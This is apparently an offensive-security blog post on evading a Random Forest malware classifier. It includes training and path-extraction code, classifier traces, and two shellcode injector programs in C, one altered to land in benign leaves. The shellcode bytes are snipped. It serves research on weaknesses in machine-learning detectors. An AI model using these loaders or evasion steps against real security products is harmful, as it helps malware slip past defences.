# Hiding in the Trees

Machine learning components of security products come in many forms and are increasingly relevant to offensive security researchers. In [Evading the Machine](https://steve-s.gitbook.io/0xtriboulet/artificial-intelligence/evading-the-machine) I worked through a basic evasion attack against a logistic regression classifier. In that example we saw that 'the model' is really just a plane inside a three-dimensional space described by the 'features' we selected. One weakness of logistic regression is that as the number of dimensions increases, the spatial intuition behind the model begins to break down. You cannot, for example, easily plot 5 or 6 dimensions, nor can you easily visualize the hyperplane that represents the decision boundary, so achieving [explainability](https://pmc.ncbi.nlm.nih.gov/articles/PMC7824368/) becomes a challenge. Some solutions exist for these and other problems concerning the [curse of dimensionality](https://en.wikipedia.org/wiki/Curse_of_dimensionality), but we can also sidestep some of those concerns altogether by choosing a different machine learning algorithm.

[Tree-based algorithms](https://www.omdena.com/blog/tree-based-algorithms-in-machine-learning) are another common family of machine learning classifiers. Tree-based algorithms like the Random Forest classifier we'll discuss in this blog offer additional benefits: they are highly performant, deterministic, and interpretable, which potentially makes them a valuable capability in security products. In this blog we'll work through the construction of a simple Random Forest classifier, and examine the differences in the intuition required to achieve an evasion attack on these models.

The complete code and graphics for this blog are available in the [repository](https://github.com/0xTriboulet/hiding_in_the_trees).

## Building a Random Forest Classifier

For this example I reused the data from [Evading the Machine](https://steve-s.gitbook.io/0xtriboulet/artificial-intelligence/evading-the-machine), and jumped right into building the classifier. The [scikit-learn](https://scikit-learn.org/stable/) library provides a convenient implementation of Random Forests that we can use for this example.

{% code title="train\_random\_forest.py" %}

```python
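import sys

import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

# Load dataset
try:
    df = pd.read_csv("pe_features.csv")
except FileNotFoundError:
    print("Error: 'pe_features.csv' not found.")
    sys.exit(1)  # nothing to train on without the feature file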

X = df.drop(columns=["label"])
y = df["label"]

# Convert to numpy arrays to avoid feature name warnings during classification
X = X.values
y = y.values

# Train/test split
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.20, random_state=42
)

print(f"Training on {len(X_train)} samples, testing on {len(X_test)} samples.")

# Initialize and train Random Forest
# n_estimators is the number of trees in the forest
# min_impurity_decrease was set so I could reuse injector_1.cxx
rf_model = RandomForestClassifier(
    n_estimators=3, random_state=42, min_impurity_decrease=0.001
)
rf_model.fit(X_train, y_train)
```

{% endcode %}

A Random Forest classifier is an [ensemble of decision trees](https://scikit-learn.org/stable/modules/ensemble.html), each trained on a random (bootstrap) sample of the training data, with a random subset of the features considered at each split. The final prediction is made by aggregating the predictions of all the individual trees. This approach helps to reduce over-fitting and improve the model's generalization ability. In the snippet above, we specify that our random forest should be composed of 3 trees. This is for simplicity; adding more trees typically makes the predictions more stable and can improve accuracy, at the cost of a forest that is harder to read by hand.
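To make the "random subset" concrete: in scikit-learn's default configuration each tree is fit on a bootstrap sample, meaning training rows are drawn with replacement until the sample is as large as the training set. The standard-library sketch below only illustrates that sampling step for the 320 training rows reported by the script; the seed and the helper name `bootstrap_indices` are illustrative assumptions and not part of the original code.

```python
import random


def bootstrap_indices(n_samples, rng):
    """Draw n_samples row indices with replacement (one bootstrap sample)."""
    return [rng.randrange(n_samples) for _ in range(n_samples)]


rng = random.Random(42)  # arbitrary seed, only for repeatability
n_train = 320            # training-set size reported by the training script

# One bootstrap sample per tree in a 3-tree forest
samples = [bootstrap_indices(n_train, rng) for _ in range(3)]

for i, idx in enumerate(samples):
    distinct = len(set(idx)) / n_train
    # Sampling with replacement leaves roughly a third of the rows unseen
    print(f"Tree {i}: {len(idx)} draws, {distinct:.0%} distinct rows")
```

Because every tree sees a slightly different view of the data, the trees disagree in places, and that disagreement is what the averaging step smooths out.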

Unlike some model architectures, most tree-based algorithms are not sensitive to the scale of the input features. This means that we don't need to apply and save a separate scaling transformation to the data before training the model.
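One way to see why scaling doesn't matter: a tree split only asks whether a feature is above or below a threshold, so any order-preserving rescaling moves the threshold but leaves the grouping of samples unchanged. The sketch below uses made-up values and a hand-rolled `best_split` helper (an illustration, not scikit-learn's implementation) to show the same partition before and after multiplying a feature by 1000.

```python
def gini(labels):
    """Gini impurity of a list of 0/1 labels."""
    if not labels:
        return 0.0
    p = sum(labels) / len(labels)
    return 2 * p * (1 - p)


def best_split(values, labels):
    """Return (threshold, left_indices) minimizing the weighted Gini impurity."""
    candidates = sorted(set(values))
    best = None
    for lo, hi in zip(candidates, candidates[1:]):
        thr = (lo + hi) / 2  # midpoint between neighbouring values
        left = [i for i, v in enumerate(values) if v <= thr]
        right = [i for i, v in enumerate(values) if v > thr]
        score = (
            len(left) * gini([labels[i] for i in left])
            + len(right) * gini([labels[i] for i in right])
        ) / len(values)
        if best is None or score < best[0]:
            best = (score, thr, left)
    return best[1], best[2]


# Made-up feature values and labels (0 = benign, 1 = malicious)
log_size = [3.9, 4.1, 4.4, 5.0, 5.2, 5.6]
labels = [0, 0, 0, 1, 1, 1]

thr_raw, left_raw = best_split(log_size, labels)
thr_scaled, left_scaled = best_split([v * 1000 for v in log_size], labels)

print("raw threshold:", thr_raw, "left side:", left_raw)
print("scaled threshold:", thr_scaled, "left side:", left_scaled)
```

The threshold changes with the units, but the set of samples on each side of the split does not, which is why no scaler has to be saved alongside the model.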

Once we've implemented the training script above, we can run it and examine how the model performs on the test set.

```bash
Training on 320 samples, testing on 80 samples.

Test Accuracy: 88.75%

Classification Report:
              precision    recall  f1-score   support
           0       0.89      0.86      0.87        36
           1       0.89      0.91      0.90        44
           
    accuracy                           0.89        80
   macro avg       0.89      0.89      0.89        80
weighted avg       0.89      0.89      0.89        80


Model saved to random_forest_model.pkl
```

The model achieves an accuracy of roughly 89% (88.75%) on the test set, which is not particularly good, but it works well enough for this example.
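The rounded figures in the report are consistent with one specific confusion matrix, which gives a better feel for where the model errs. The counts below are inferred from the support and recall columns rather than printed by the training script, so treat them as a reconstruction.

```python
# Counts inferred from the report (support 36 / 44, recall 0.86 / 0.91)
tn, fp = 31, 5   # truly benign:    31 labeled benign, 5 labeled malware
fn, tp = 4, 40   # truly malicious: 4 labeled benign, 40 labeled malware

total = tn + fp + fn + tp
accuracy = (tn + tp) / total

recall_benign = tn / (tn + fp)
recall_malware = tp / (tp + fn)
precision_benign = tn / (tn + fn)
precision_malware = tp / (tp + fp)

print(f"accuracy: {accuracy:.4f}")
print(f"class 0 precision / recall: {precision_benign:.2f} / {recall_benign:.2f}")
print(f"class 1 precision / recall: {precision_malware:.2f} / {recall_malware:.2f}")
```

Under that reconstruction, 9 of the 80 test samples are misclassified, and 4 of those are malicious samples that the forest labels as benign.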

## Learning About the Classifier

For a Random Forest, the "decision boundary" is complex. It can be described as a series of axis-aligned splits that carve the feature space into hyper-rectangles. But because fundamentally a forest is just a collection of decision trees, we can actually "read" the logic of the classifier by looking at the individual trees.

<figure><img src="/files/Q82aFzm7fXBoVZdeJnXe" alt=""><figcaption></figcaption></figure>

The intuition here is that the model invokes each tree in the forest and aggregates their individual predictions into a final one. This means that we can navigate the trees to understand the decision boundary of the model, and how a given binary's features are used to make a prediction.

In this example our forest consists of 3 trees, and we can examine the output of each tree individually to assess how a given binary will be classified. To simplify this process, `classify.py` is implemented to take in a path to a binary, and output a trace of the classification path through the trees. For convenience, I'll reuse the injector binary from [Evading the Machine](https://steve-s.gitbook.io/0xtriboulet/artificial-intelligence/evading-the-machine).

{% code title="injector.cxx" %}

```c
// clang injector.cxx -o injector.exe
#include <windows.h>
#include <stdio.h>

UCHAR payload[] = {
...snip...
};


INT main(){
	
	PVOID  pPayload      = NULL;
	HANDLE hThread       = NULL;
	SIZE_T szPayloadSize = sizeof(payload);
	
	pPayload = VirtualAlloc(NULL, szPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	RtlCopyMemory(pPayload, payload, szPayloadSize);
	
	hThread  = CreateThread(NULL, 0x0, (LPTHREAD_START_ROUTINE) pPayload, NULL, 0x0, NULL);
	
	WaitForSingleObject(hThread, INFINITE);
	
	return 0;
}
```

{% endcode %}

We build the injector binary using `clang` and then run it through `classify.py` to see how the forest classifies it. The output shows that the injector binary is classified as malware. The decision path through each tree ends in a leaf node with a class distribution (annotated as \[Benign, Malicious]): \[0. 1.] in `Tree 0`, \[0.03125 0.96875] in `Tree 1`, and \[1. 0.] in `Tree 2`. Note that `Tree 2` actually classified the sample as `Benign`. The mean of the second number in each of those arrays is the ensemble's (i.e., the forest's) predicted probability of malware, here `0.6562`.

```bash
(.venv) hiding_in_the_trees>python .\classify.py .\c\injector.exe                                                              
File: injector.exe
Extracted Features:
  - weighted_entropy: 5.5628
  - strings_density: 11.9810
  - log_size: 5.0336
Probability of malware: 0.6562
Classification: MALWARE

Decision Paths across Forest:  # I'm lazy so I'm using Tree 1 because it's the shortest path to a decision
[Tree 0] decision path:
...snip...
  Leaf 35: Distribution [0. 1.]

[Tree 1] decision path:
  Node 0: log_size (5.0336) > 4.5512
  Node 6: log_size (5.0336) <= 5.3869
  Node 7: strings_density (11.9810) > 3.0003
  Node 9: weighted_entropy (5.5628) > 5.4790
  Node 15: strings_density (11.9810) > 10.1599
  Leaf 25: Distribution [0.03125 0.96875]

[Tree 2] decision path:
...snip...
  Leaf 35: Distribution [1. 0.]
```
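The forest's probability can be reproduced by hand from the three leaf distributions in the trace. The sketch below averages the malicious column; the 0.5 cut-off used for the label is an assumption about `classify.py`, which isn't shown here.

```python
# Leaf distributions reported for injector.exe, as [benign, malicious]
leaf_distributions = [
    [0.0, 1.0],          # Tree 0
    [0.03125, 0.96875],  # Tree 1
    [1.0, 0.0],          # Tree 2
]

# The forest's malware probability is the mean of the per-tree malicious share
p_malware = sum(dist[1] for dist in leaf_distributions) / len(leaf_distributions)

# Assumed decision threshold of 0.5 (not confirmed by the original script)
label = "MALWARE" if p_malware > 0.5 else "BENIGN"

print(f"Probability of malware: {p_malware:.4f}")
print(f"Classification: {label}")
```

With only three trees, flipping a single additional tree to a benign leaf is enough to pull the mean below one half.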

We can follow this decision path in the `.png` rendering of the forest to understand how the classifier makes its predictions. By default, the left branch is taken when a node's condition is `True`, and the right branch when it is `False`.

<figure><img src="/files/AxwVRib3ShYxplKkvD9b" alt=""><figcaption></figcaption></figure>

Repeating this process for the other trees in the forest results in a highly interpretable intuition for the decision boundary of the model. However, because there are multiple trees, each with many branches, reversing a set of properties to make the binary benign is not straightforward. The model's decision boundary is complex and requires a deep understanding of the feature space to reverse engineer.
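A decision path is just a conjunction of threshold checks, which makes it easy to replay outside the model. The sketch below encodes the `Tree 1` path from the trace for `injector.exe` and tests a feature vector against it; the helper name `follows_path` and the modified entropy value are illustrative assumptions.

```python
import operator

OPS = {"<=": operator.le, ">": operator.gt}

# Features extracted from injector.exe
features = {"weighted_entropy": 5.5628, "strings_density": 11.9810, "log_size": 5.0336}

# Tree 1 decision path, copied from the classify.py trace
tree1_path = [
    ("log_size", ">", 4.5512),
    ("log_size", "<=", 5.3869),
    ("strings_density", ">", 3.0003),
    ("weighted_entropy", ">", 5.4790),
    ("strings_density", ">", 10.1599),
]


def follows_path(sample, path):
    """True when the sample satisfies every condition along the path."""
    return all(OPS[op](sample[name], thr) for name, op, thr in path)


print(follows_path(features, tree1_path))

# Lowering the entropy below 5.4790 breaks the fourth condition, so the
# sample leaves this leaf. Where it lands instead depends on branches that
# are not part of this path.
lower_entropy = {**features, "weighted_entropy": 5.0}
print(follows_path(lower_entropy, tree1_path))
```

Breaking one condition only tells us the sample exits a malicious leaf; it says nothing about the leaf it enters, which is why the next section works from the benign leaves backwards.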

## Evading the Classifier

What we can do now is extract the paths from the Random Forest that result in a `Benign` classification. We do this by identifying the output points (i.e., the leaf nodes) in each tree that result in `Benign` classifications, and then walking back through the logic of the forest to identify the feature conditions that lead to these leaves. We can `AND` together the conditions at each node along the way to build our intuition for the properties a binary needs in order to be classified as benign. A similar technique using classification paths has been used by [CrowdStrike](https://www.crowdstrike.com/en-us/blog/embersim-large-databank-for-similarity-research-in-cybersecurity/) to improve the detection of sample similarities. For our purposes, we care about extracting information from the trees to facilitate the development of an evasive binary. I implemented this logic in `evasive_analysis.py`, and the core logic is below.

{% code title="evasive\_analysis.py (core loop)" %}

```python
for i, estimator in enumerate(rf_model.estimators_):
    print(f"Tree {i}:")
    tree = estimator.tree_

    # Identify all leaf nodes
    children_left = tree.children_left
    children_right = tree.children_right
    feature = tree.feature
    threshold = tree.threshold
    value = tree.value

    # Find leaves where class 0 (Benign) is the majority
    # value[node_id][0] gives the class distribution [class_0, class_1] at that node
    benign_leaf_ids = [
        node_id for node_id in range(tree.node_count)
        if children_left[node_id] == -1 and np.argmax(value[node_id][0]) == 0
    ]

    for leaf_id in benign_leaf_ids:
        # Trace path from leaf back to root
        path_constraints = []
        curr = leaf_id

        while curr != 0:  # 0 is the root node
            # Find parent
            parent = -1
            direction = ""

            # Check if current node is a left or right child of some parent
            for node_id in range(tree.node_count):
                if children_left[node_id] == curr:
                    parent = node_id
                    direction = "<="
                    break
                if children_right[node_id] == curr:
                    parent = node_id
                    direction = ">"
                    break

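            fname = feature_names[feature[parent]]
            thresh = threshold[parent]
            path_constraints.append(f"{fname} {direction} {thresh:.4f}")
            curr = parent

        # Constraints were collected leaf-to-root; reverse them to read root-to-leaf
        path = " AND ".join(reversed(path_constraints))
        print(f"  [Leaf {leaf_id}] Path to Benign: {path}")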
```

{% endcode %}
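The inner loop above rescans every node to find each parent, which is fine for three small trees but grows quadratically on deeper ones. One alternative is to build a child-to-parent map in a single pass and walk it upward. The sketch below uses plain lists that mimic the layout of `tree_.children_left`, `tree_.children_right`, `tree_.feature`, and `tree_.threshold` (with `-1` marking a leaf); the toy tree and the helper names are made up for illustration.

```python
def build_parent_map(children_left, children_right):
    """Map each child node id to (parent id, operator taken to reach the child)."""
    parents = {}
    for node_id, (left, right) in enumerate(zip(children_left, children_right)):
        if left != -1:  # internal node; -1 marks a leaf
            parents[left] = (node_id, "<=")
            parents[right] = (node_id, ">")
    return parents


def path_to_leaf(leaf_id, parents, feature, threshold, feature_names):
    """Return the root-to-leaf constraints for one leaf."""
    constraints = []
    curr = leaf_id
    while curr in parents:  # the root has no parent, so the walk stops there
        parent, op = parents[curr]
        name = feature_names[feature[parent]]
        constraints.append(f"{name} {op} {threshold[parent]:.4f}")
        curr = parent
    return constraints[::-1]


# Hypothetical 5-node tree: node 0 is the root, nodes 2, 3, and 4 are leaves
feature_names = ["weighted_entropy", "strings_density", "log_size"]
children_left = [1, 2, -1, -1, -1]
children_right = [4, 3, -1, -1, -1]
feature = [0, 1, -2, -2, -2]
threshold = [5.0, 10.0, -2.0, -2.0, -2.0]
value = [[0.5, 0.5], [0.6, 0.4], [0.0, 1.0], [1.0, 0.0], [0.2, 0.8]]

parents = build_parent_map(children_left, children_right)
benign_leaves = [
    n for n in range(len(value))
    if children_left[n] == -1 and value[n][0] > value[n][1]
]
paths = {
    leaf: path_to_leaf(leaf, parents, feature, threshold, feature_names)
    for leaf in benign_leaves
}

for leaf, constraints in paths.items():
    print(f"[Leaf {leaf}] Path to Benign: {' AND '.join(constraints)}")
```

The output format mirrors the one used by `evasive_analysis.py`, so the same downstream simplification applies.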

The script will generate a bunch of statements like the one below, broken out by tree. For simplicity, I'll focus on achieving the benign classification for `Tree 0`, but this same technique can, and sometimes *must*, be applied to multiple trees.

```
  [Leaf 34] Path to Benign: weighted_entropy <= 6.2961 AND strings_density > 3.5898 AND weighted_entropy > 4.0754 AND strings_density > 10.0563 AND log_size <= 5.0679 AND log_size <= 5.0572 AND weighted_entropy <= 5.0910
```

And we can either think really hard about how to simplify the logic, or pass it into your favorite large language model to take a guess. I did the latter and got the following.

```
[Leaf 34] 4.0754 < weighted_entropy <= 5.0910 AND strings_density > 10.0563 AND log_size <= 5.0572
```
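The same simplification can also be done deterministically: every clause is either a lower bound (`>`) or an upper bound (`<=`) on one feature, so keeping the tightest bound on each side collapses the path into one interval per feature. A minimal sketch, with `simplify` as a hypothetical helper name:

```python
import math

raw_path = (
    "weighted_entropy <= 6.2961 AND strings_density > 3.5898 AND "
    "weighted_entropy > 4.0754 AND strings_density > 10.0563 AND "
    "log_size <= 5.0679 AND log_size <= 5.0572 AND weighted_entropy <= 5.0910"
)


def simplify(path):
    """Collapse 'feature op threshold' clauses into one (low, high] interval per feature."""
    bounds = {}
    for clause in path.split(" AND "):
        name, op, value = clause.split()
        low, high = bounds.get(name, (-math.inf, math.inf))
        if op == ">":
            low = max(low, float(value))    # keep the tightest lower bound
        elif op == "<=":
            high = min(high, float(value))  # keep the tightest upper bound
        else:
            raise ValueError(f"unexpected operator: {op}")
        bounds[name] = (low, high)
    return bounds


intervals = simplify(raw_path)
for name, (low, high) in intervals.items():
    print(f"{low} < {name} <= {high}")
```

The resulting intervals agree with the simplified statement for `Leaf 34`, with infinite bounds standing in for the sides a feature is unconstrained on.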

We can then modify our binary so that it fits the properties of our target path to the benign leaf node, and at that point we can expect that the classifier will output a benign label.

{% code title="injector\_1.cxx" %}

```c
// clang .\injector_1.cxx -o injector_1.exe -nostdlib -lmsvcrt -lkernel32
#include <windows.h>
#include <stdio.h>

__attribute__((section(".text"))) UCHAR payload[] = {
...snip...
};

typedef LPVOID (WINAPI * VirtualAlloc_t)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD  flAllocationType,
    DWORD  flProtect
);

typedef HANDLE (WINAPI * CreateThread_t)(
    LPSECURITY_ATTRIBUTES   lpThreadAttributes,
    SIZE_T                  dwStackSize,
    LPTHREAD_START_ROUTINE  lpStartAddress,
    __drv_aliasesMem LPVOID lpParameter,
    DWORD                   dwCreationFlags,
    LPDWORD                 lpThreadId
);

typedef DWORD (WINAPI * WaitForSingleObject_t)(
    HANDLE hHandle,
    DWORD dwMilliseconds
);

INT main(){
	
	PVOID  pPayload      = NULL;
	HANDLE hThread       = NULL;
	SIZE_T szPayloadSize = sizeof(payload);
	
	HMODULE hKernel32                           = NULL;
	
	VirtualAlloc_t        pVirtualAlloc         = NULL;
	CreateThread_t        pCreateThread         = NULL;
	WaitForSingleObject_t pWaitForSingleObject  = NULL;
	
	hKernel32            = GetModuleHandleA("kernel32.dll");
	pVirtualAlloc        = (VirtualAlloc_t) GetProcAddress(hKernel32, "VirtualAlloc");
	pCreateThread        = (CreateThread_t) GetProcAddress(hKernel32, "CreateThread");
	pWaitForSingleObject = (WaitForSingleObject_t) GetProcAddress(hKernel32, "WaitForSingleObject");
	
	pPayload = pVirtualAlloc(NULL, szPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	RtlCopyMemory(pPayload, payload, szPayloadSize);
	
	hThread  = pCreateThread(NULL, 0x0, (LPTHREAD_START_ROUTINE) pPayload, NULL, 0x0, NULL);
	
	pWaitForSingleObject(hThread, INFINITE);

	return 0;
}
```

{% endcode %}

For this example I was able to reuse the `injector_1.exe`.

```bash
(.venv) hiding_in_the_trees>python .\classify.py .\c\injector_1.exe
File: injector_1.exe
Extracted Features:
  - weighted_entropy: 4.1983
  - strings_density: 14.1905
  - log_size: 4.0315
```

We see that the `injector_1.exe` has a weighted entropy of `4.1983` (which is between 4.0754 and 5.0910), a strings density of `14.1905` (which is greater than 10.0563), a log size of `4.0315` (which is less than 5.0572) and therefore satisfies our simplified path to `Leaf 34` in `Tree 0`. In this case, these properties also achieve a benign classification for `Tree 2` and therefore a benign label from the forest.
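Beyond a yes/no check, it can be useful to know how much room each feature has before it crosses a bound, since a rebuild or a different payload will shift the values. The sketch below computes that margin for `injector_1.exe` against the simplified `Leaf 34` intervals; the `slack` helper is an illustrative assumption.

```python
import math

# Features extracted from injector_1.exe
features = {"weighted_entropy": 4.1983, "strings_density": 14.1905, "log_size": 4.0315}

# Simplified path to Leaf 34 in Tree 0: (exclusive lower bound, inclusive upper bound)
leaf_34 = {
    "weighted_entropy": (4.0754, 5.0910),
    "strings_density": (10.0563, math.inf),
    "log_size": (-math.inf, 5.0572),
}


def slack(sample, box):
    """For each feature, report whether it is inside its interval and the
    distance to the nearest bound."""
    result = {}
    for name, (low, high) in box.items():
        value = sample[name]
        inside = low < value <= high
        margin = min(value - low, high - value)
        result[name] = (inside, margin)
    return result


margins = slack(features, leaf_34)
for name, (inside, margin) in margins.items():
    print(f"{name}: inside={inside}, margin={margin:.4f}")
```

Here the weighted entropy is the tightest constraint, sitting only about 0.12 above its lower bound, so that is the feature most likely to knock the binary out of the leaf after a change.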

```bash
(.venv) hiding_in_the_trees>python .\classify.py .\c\injector_1.exe
File: injector_1.exe
...snip see above...
Probability of malware: 0.3333
Classification: BENIGN

Decision Paths across Forest:

[Tree 0] decision path:
  Node 0: weighted_entropy (4.1983) <= 6.2961
  Node 1: strings_density (14.1905) > 3.5898
  Node 7: weighted_entropy (4.1983) > 4.0754
  Node 17: strings_density (14.1905) > 10.0563
  Node 31: log_size (4.0315) <= 5.0679
  Node 32: log_size (4.0315) <= 5.0572
  Node 33: weighted_entropy (4.1983) <= 5.0910
  Leaf 34: Distribution [1. 0.]

[Tree 1] decision path:
  Node 0: log_size (4.0315) <= 4.5512
  Node 1: log_size (4.0315) <= 4.5124
  Leaf 2: Distribution [0. 1.]

[Tree 2] decision path:
  Node 0: strings_density (14.1905) > 6.1848
  Node 18: log_size (4.0315) <= 5.5100
  Node 19: weighted_entropy (4.1983) <= 6.4057
  Node 20: strings_density (14.1905) > 9.7186
  Node 34: weighted_entropy (4.1983) <= 6.0355
  Leaf 35: Distribution [1. 0.]
```
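Why satisfying `Tree 0` was enough here can be checked by intersecting the regions of the two benign leaves. The intervals below are derived from the `Tree 0` and `Tree 2` paths in the trace above; `intersect` is a hypothetical helper that returns `None` when the regions don't overlap.

```python
import math

# (exclusive lower bound, inclusive upper bound) per feature
tree0_leaf34 = {
    "weighted_entropy": (4.0754, 5.0910),
    "strings_density": (10.0563, math.inf),
    "log_size": (-math.inf, 5.0572),
}
tree2_leaf35 = {
    "weighted_entropy": (-math.inf, 6.0355),
    "strings_density": (9.7186, math.inf),
    "log_size": (-math.inf, 5.5100),
}


def intersect(box_a, box_b):
    """Intersect two hyper-rectangles feature by feature; None if empty."""
    result = {}
    for name in box_a:
        low = max(box_a[name][0], box_b[name][0])
        high = min(box_a[name][1], box_b[name][1])
        if low >= high:
            return None  # no value can satisfy both leaves on this feature
        result[name] = (low, high)
    return result


both = intersect(tree0_leaf34, tree2_leaf35)
print(both)
print("Tree 0 region lies inside Tree 2 region:", both == tree0_leaf34)
```

In this forest the `Tree 0` leaf sits entirely inside the `Tree 2` leaf, so any binary that reaches `Leaf 34` also reaches `Leaf 35`. With more trees, the intersection shrinks and may be empty for a given choice of leaves, which is where the search becomes harder.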

## Considerations

This post explored how tree-based models differ from linear classifiers. While a logistic regression offers a single, smooth decision boundary, a Random Forest creates a "jagged" landscape of Boolean logic. We saw that while this complexity can make manual intuition harder, it also makes the model more transparent to programmatic reverse-engineering.

One major consideration is the size and complexity of the forest. In this example, we used a very small forest with only 3 trees and 3 features. Modern production classifiers may use hundreds of trees and thousands of features (including imports, API call sequences, and byte-level histograms). This creates a massive search space for evasion, where satisfying the "Benign" paths for a majority of trees becomes a significant optimization challenge.

Furthermore, this analysis assumes "White Box" access, where we have knowledge of the features the model is expecting, we have the model file (`.pkl`), and we can inspect the model's internal thresholds. In a more constrained "Black Box" scenario, an attacker can't directly backtrack paths and must instead rely on probing the model with variations of a binary to map out the decision surface indirectly.
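As a rough illustration of what black-box probing means, the sketch below bisects a single feature to locate the point where a label flips. Everything here is a toy assumption: `toy_oracle` stands in for a remote classifier, its hidden threshold of 4.8 is made up, and the search assumes the label flips exactly once in the probed range and that the feature can be varied on its own, which a real binary rarely allows.

```python
def find_threshold(oracle, low, high, tol=1e-4):
    """Bisect one feature to locate where the oracle's label flips.

    Returns None when both ends of the range already get the same label.
    """
    label_low = oracle(low)
    if label_low == oracle(high):
        return None
    while high - low > tol:
        mid = (low + high) / 2
        if oracle(mid) == label_low:
            low = mid   # flip point is above mid
        else:
            high = mid  # flip point is at or below mid
    return (low + high) / 2


def toy_oracle(log_size):
    """Hypothetical stand-in for a classifier we can only query."""
    return "BENIGN" if log_size <= 4.8 else "MALWARE"


estimate = find_threshold(toy_oracle, 3.0, 7.0)
print(f"Estimated flip point: {estimate:.3f}")
```

Each query halves the uncertainty, so a single threshold is cheap to recover, but a forest has many thresholds per feature and the features interact, which is what makes the black-box setting so much more expensive than reading the `.pkl` directly.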

## Conclusion

By moving from a simple linear model to a Random Forest, we’ve seen that machine learning evasion is less about "tricking" an AI and more about understanding the specific logical constraints of a data-driven system. We demonstrated that if you can extract the underlying decision paths, you can deterministically derive the exact properties needed to nudge a malicious binary into a benign leaf in the trees (i.e., a "hyper-rectangle" of the feature space). Again, this intuition offers insights to offensive security practitioners on how to improve their understanding of machine learning features in security products, and (for defenders) how the mechanisms of a classifier can be improved to mitigate the risks of these attacks.

